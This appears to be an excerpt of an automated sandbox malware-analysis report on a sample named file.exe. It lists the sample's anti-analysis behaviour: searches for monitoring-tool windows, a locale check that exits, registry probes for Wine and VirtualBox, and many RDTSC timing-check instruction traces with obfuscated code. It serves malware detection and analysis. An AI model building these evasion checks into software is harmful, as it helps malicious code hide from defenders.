Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00939860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-52862

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEDC6B second address: CEDC77 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0674F129A6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF3DFE second address: CF3E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F0674CEBDF8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF3FC1 second address: CF3FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0674F129B3h 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF3FE5 second address: CF4002 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F0674CEBE07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF4153 second address: CF4175 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0674F129BBh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7279 second address: CF7284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0674CEBDF6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7284 second address: CF72B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674F129ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov cx, dx 0x0000000d push 00000000h 0x0000000f sub dword ptr [ebp+122D19F9h], esi 0x00000015 add dword ptr [ebp+122D1A8Eh], edx 0x0000001b push 472E4D5Dh 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF72B0 second address: CF7362 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0674CEBDF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F0674CEBE03h 0x00000010 pop ebx 0x00000011 popad 0x00000012 xor dword ptr [esp], 472E4DDDh 0x00000019 xor dx, CB4Ah 0x0000001e push 00000003h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007F0674CEBDF8h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a push esi 0x0000003b jmp 00007F0674CEBDFCh 0x00000040 pop esi 0x00000041 adc edi, 70EE55B6h 0x00000047 mov dword ptr [ebp+122D31DEh], ebx 0x0000004d push 00000000h 0x0000004f pushad 0x00000050 xor ecx, dword ptr [ebp+122D2A72h] 0x00000056 jl 00007F0674CEBE0Ch 0x0000005c jmp 00007F0674CEBE06h 0x00000061 popad 0x00000062 push 00000003h 0x00000064 jmp 00007F0674CEBE03h 0x00000069 call 00007F0674CEBDF9h 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 popad 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7362 second address: CF7366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7366 second address: CF73AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0674CEBDFDh 0x0000000b popad 0x0000000c push eax 0x0000000d ja 00007F0674CEBDFEh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007F0674CEBE05h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF73AC second address: CF73B6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0674F129ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7476 second address: CF7488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674CEBDFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7488 second address: CF748E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF748E second address: CF74E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jno 00007F0674CEBDFAh 0x00000011 push ebx 0x00000012 add edx, dword ptr [ebp+122D1AD0h] 0x00000018 pop edi 0x00000019 push 00000000h 0x0000001b mov cl, bh 0x0000001d call 00007F0674CEBDF9h 0x00000022 jc 00007F0674CEBE0Eh 0x00000028 jmp 00007F0674CEBE08h 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F0674CEBDFAh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF74E3 second address: CF74ED instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0674F129ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF74ED second address: CF7501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F0674CEBDF6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7501 second address: CF7507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7507 second address: CF7597 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F0674CEBDFCh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jc 00007F0674CEBDFEh 0x00000015 push eax 0x00000016 jnp 00007F0674CEBDF6h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 jng 00007F0674CEBE00h 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jnc 00007F0674CEBDF6h 0x00000030 popad 0x00000031 pop eax 0x00000032 xor dword ptr [ebp+122D3851h], edi 0x00000038 push 00000003h 0x0000003a push esi 0x0000003b mov esi, dword ptr [ebp+122D295Ah] 0x00000041 pop edx 0x00000042 push 00000000h 0x00000044 mov ecx, dword ptr [ebp+122D3086h] 0x0000004a push 00000003h 0x0000004c push 00000000h 0x0000004e push ebx 0x0000004f call 00007F0674CEBDF8h 0x00000054 pop ebx 0x00000055 mov dword ptr [esp+04h], ebx 0x00000059 add dword ptr [esp+04h], 0000001Dh 0x00000061 inc ebx 0x00000062 push ebx 0x00000063 ret 0x00000064 pop ebx 0x00000065 ret 0x00000066 mov dword ptr [ebp+122D2EF6h], ecx 0x0000006c call 00007F0674CEBDF9h 0x00000071 jc 00007F0674CEBE15h 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7597 second address: CF75F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674F129B7h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F0674F129AEh 0x00000011 jc 00007F0674F129A8h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f jc 00007F0674F129B4h 0x00000025 jmp 00007F0674F129AEh 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0674F129B1h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7699 second address: CF76AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0674CEBE00h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF76AD second address: CF76FD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0674F129A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jc 00007F0674F129B2h 0x00000013 jnc 00007F0674F129ACh 0x00000019 nop 0x0000001a sub dword ptr [ebp+122D344Dh], ecx 0x00000020 push 00000000h 0x00000022 jmp 00007F0674F129B5h 0x00000027 push 07485280h 0x0000002c push eax 0x0000002d push edx 0x0000002e push ebx 0x0000002f jmp 00007F0674F129AAh 0x00000034 pop ebx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF76FD second address: CF7707 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0674CEBDFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7707 second address: CF7792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 07485200h 0x0000000d xor dword ptr [ebp+122D19F9h], edi 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F0674F129A8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f xor esi, dword ptr [ebp+122D2B86h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F0674F129A8h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 mov dword ptr [ebp+122D2CC9h], ebx 0x00000057 push 00000003h 0x00000059 call 00007F0674F129ABh 0x0000005e push esi 0x0000005f sub dword ptr [ebp+122D1856h], ebx 0x00000065 pop esi 0x00000066 pop esi 0x00000067 call 00007F0674F129A9h 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f push edx 0x00000070 pop edx 0x00000071 pushad 0x00000072 popad 0x00000073 popad 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7792 second address: CF77AD instructions: 0x00000000 rdtsc 0x00000002 je 00007F0674CEBDF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F0674CEBDFCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF77AD second address: CF77E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0674F129B8h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 jmp 00007F0674F129AEh 0x00000015 pop ecx 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b push edx 0x0000001c pop edx 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17E6D second address: D17E73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17E73 second address: D17E9A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0674F129C2h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D15BB6 second address: D15BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D15E7E second address: D15EAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0674F129ACh 0x0000000c jmp 00007F0674F129B3h 0x00000011 popad 0x00000012 pop esi 0x00000013 pushad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16030 second address: D16040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0674CEBDFBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16040 second address: D16046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16046 second address: D16097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0674CEBDF6h 0x0000000a popad 0x0000000b jmp 00007F0674CEBE08h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 jmp 00007F0674CEBDFCh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0674CEBE03h 0x0000001f jmp 00007F0674CEBDFAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16097 second address: D1609B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D163B1 second address: D163B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D163B5 second address: D163D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F0674F129B8h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16856 second address: D1685C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16E2B second address: D16E39 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0674F129A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16E39 second address: D16E6C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0674CEBDF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007F0674CEBDFEh 0x00000013 pop eax 0x00000014 jmp 00007F0674CEBE06h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16E6C second address: D16E71 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16FFA second address: D17002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17002 second address: D17006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17006 second address: D1700A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1700A second address: D17010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1787A second address: D17884 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0674CEBDF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17884 second address: D17890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D179E8 second address: D179EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D179EC second address: D179F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D179F0 second address: D17A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674CEBE01h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17C9E second address: D17CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17CA2 second address: D17CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17CAC second address: D17CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17CB2 second address: D17CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17CB6 second address: D17CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674F129ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F0674F129A6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17CD5 second address: D17D1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674CEBDFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0674CEBE08h 0x0000000e pushad 0x0000000f jmp 00007F0674CEBE09h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1CDE9 second address: D1CDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1CDEF second address: D1CE1C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0674CEBDF6h 0x00000008 jmp 00007F0674CEBE00h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0674CEBDFAh 0x00000014 pushad 0x00000015 jno 00007F0674CEBDF6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1CE1C second address: D1CE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 js 00007F0674F129B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1CE2E second address: D1CE34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1EDE0 second address: D1EDE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1EDE4 second address: D1EDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnc 00007F0674CEBE00h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE8D65 second address: CE8D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0674F129B8h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F0674F129B0h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE8D98 second address: CE8D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE8D9E second address: CE8DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D225C3 second address: D225E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674CEBE07h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2278B second address: D2279D instructions: 0x00000000 rdtsc 0x00000002 je 00007F0674F129A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2279D second address: D227A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D227A3 second address: D227C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F0674F129A6h 0x00000011 popad 0x00000012 jp 00007F0674F129ACh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D227C5 second address: D227CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D227CB second address: D227CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D273A9 second address: D273BB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0674CEBDF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F0674CEBDFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27AD6 second address: D27B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674F129B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0674F129AEh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jnp 00007F0674F129C7h 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27B08 second address: D27B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674CEBE09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edi 0x0000000c jo 00007F0674CEBDFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27B30 second address: D27B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27C7F second address: D27C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27ED2 second address: D27EF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0674F129ACh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0674F129B0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D28139 second address: D2813D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2813D second address: D28141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D28141 second address: D28147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
